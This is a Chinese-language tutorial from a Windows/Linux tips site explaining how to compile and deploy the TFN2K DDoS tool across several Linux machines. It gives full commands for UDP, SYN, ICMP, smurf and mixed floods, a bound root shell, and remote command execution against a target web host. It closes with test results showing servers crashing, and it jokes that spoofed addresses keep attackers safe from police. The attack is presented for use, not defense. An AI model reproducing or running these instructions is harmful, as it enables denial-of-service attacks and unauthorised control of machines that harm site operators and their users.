Windows XP Windows 7 Windows 2003 Windows Vista Windows教程綜合 Linux 系統教程
Windows 10 Windows 8 Windows 2008 Windows NT Windows Server 電腦軟件教程
 Windows教程網 >> Linux系統教程 >> Linux教程 >> Linux對Windows系統進行DDOS攻擊的方法

Linux對Windows系統進行DDOS攻擊的方法

日期:2017/2/7 9:21:43      編輯:Linux教程

首先說我們用來攻擊的客戶機和服務器的配置方法,使用當下最有名的REDHAT LINUX進行測試,本次攻擊測試我使用的是FEDORA CORE3 ,軟件用的是最有名的DDOS。

  首先說我們用來攻擊的客戶機和服務器的配置方法,使用當下最有名的REDHAT LINUX進行測試,本次攻擊測試我使用的是FEDORA CORE3 ,軟件用的是最有名的DDOS。

  廢話不說了,開始設置服務器。

  解壓 tar -zxvf tfn2k.tgz

  一.安裝TFN2K

  TFN2K為開放原代碼的軟件,所以需要我們進行編譯,這個不用說了,編譯應該都會的吧,但有幾個地方是必需注意的,因為使用不同版本和廠商的LINUX需要不同的設置。

  先修改src/ip.h

  注釋掉以下部分,否則編譯出錯。

  /*struct in_addr

  {

  unsigned long int s_addr;

  };*/

  然後make進行編譯

  編譯時會提示你輸入服務器端進行密碼設置8-32位,(攻擊的時候需要輸入密碼)編譯後會出現兩個新的執行文件td 和 tfn,其中td是守護進程,也是客戶機的使用進程。而tfn是服務器控制進程,如果想攻擊別人就必需先起動td這個進程,然後再運行服務器進程,否則攻 擊無效,更改密碼可以執行mkpass進行更改。最後在所有的客戶機中安裝並運行td(需要ROOT權限),並且在服務器上建立一個文本文件,文件中記錄 所有的客戶機IP地址(用VI編輯一個就可行了),格式為:

  192.168.0.1

  192.168.0.2

  192.168.0.3

  IP

  IP

  ……

  然後在主服務器上運行./tfn

  二.攻擊

  ./tfn直接回車大家可以看到一些參數,英文好的朋友估計不用我來多講了:)

  格式./tfn <參數>

  無用的參數我們不提,我們來說攻擊用的

  -f 這個參數後面跟剛才所寫的文本文件名,就是真正實現DDOS攻擊,而不是DOS

  -h DOS攻擊,也就是單機,一對一的攻擊 後面跟一個主機或IP地址

  -p 後面指定一個端口,不用說了

  -c 最關鍵的參數,一共有11個選相

  0 - 停止攻擊,發善心用的

  1 - 反欺騙等級設定 ,因為TFN這個工具在攻擊的時候所發出的數據包是帶有源地址的,但是源地址是隨機的,也就是說地址不是你自給的,所以不用擔心警察抓,哈哈

  2 - 改編數據包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。

  3 - 綁定root shell:啟動一個會話服務,然後你連接一個指定端口就可以得到一個root shell。

  4 - UDP洪水攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。

  5 - SYN洪水攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力,是標准的拒絕服務攻擊.

  6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。

  7 - SMURF攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。

  8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等,輪番轟炸:)

  9 - TARGA3攻擊

  10 - 遠程命令執行,這個參數是TFN的附加功能,其實TFN的攻擊不僅僅是DOS,還可以遠程的進行明令控制,如:

  ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i後面跟"命令"

  參數基本說完,下面攻擊

  ./tfn -f hostext -c 4 -i www.xxx.com

  使用hostext文件中記錄的主機對163服務器進行UDP攻擊(所有的主機中必需已經起動td進程)

  ./tfn -f hostext -c 5 -i www.xxx.com -p 80

  使用hostext文件中記錄的主機對163服務器進行TCP拒絕服務攻擊(80攻擊WEB,其他不用說了)

  ./tfn -f hostext -c 6 -i www.xxx.com

  使用hostext文件中記錄的主機對163服務器進行ICMP攻擊(PING攻擊,緩沖區溢出馬上死機)

  ./tfn -f hostext -c 8 -i www.xxx.com

  使用hostext文件中記錄的主機對163服務器進行ICMP&TCP&UDP輪番攻擊(如果對方是sniffer一定哭死)

  ./tfn -f hostext -c 0

  讓所由主機停止攻擊

  基本說完,最後說說我的測試結果

  一對一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務器CPU使用率70%以上,並時時波動

  二對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器CPU使用率100%

  五對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器死機.本人家裡只有6台機器,但如果再多點,幾十台機器,一般的個人服務器肯定要死掉了

  一對一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務器CPU使用率96%以上,並時時波動二對一攻擊,攻擊方式ICMP 連接方式本地 本地單機CPU18% 被攻擊的服務器以經無法上網,幾乎無法使用,半小時內死機.看來威力不小。

Copyright © Windows教程網 All Rights Reserved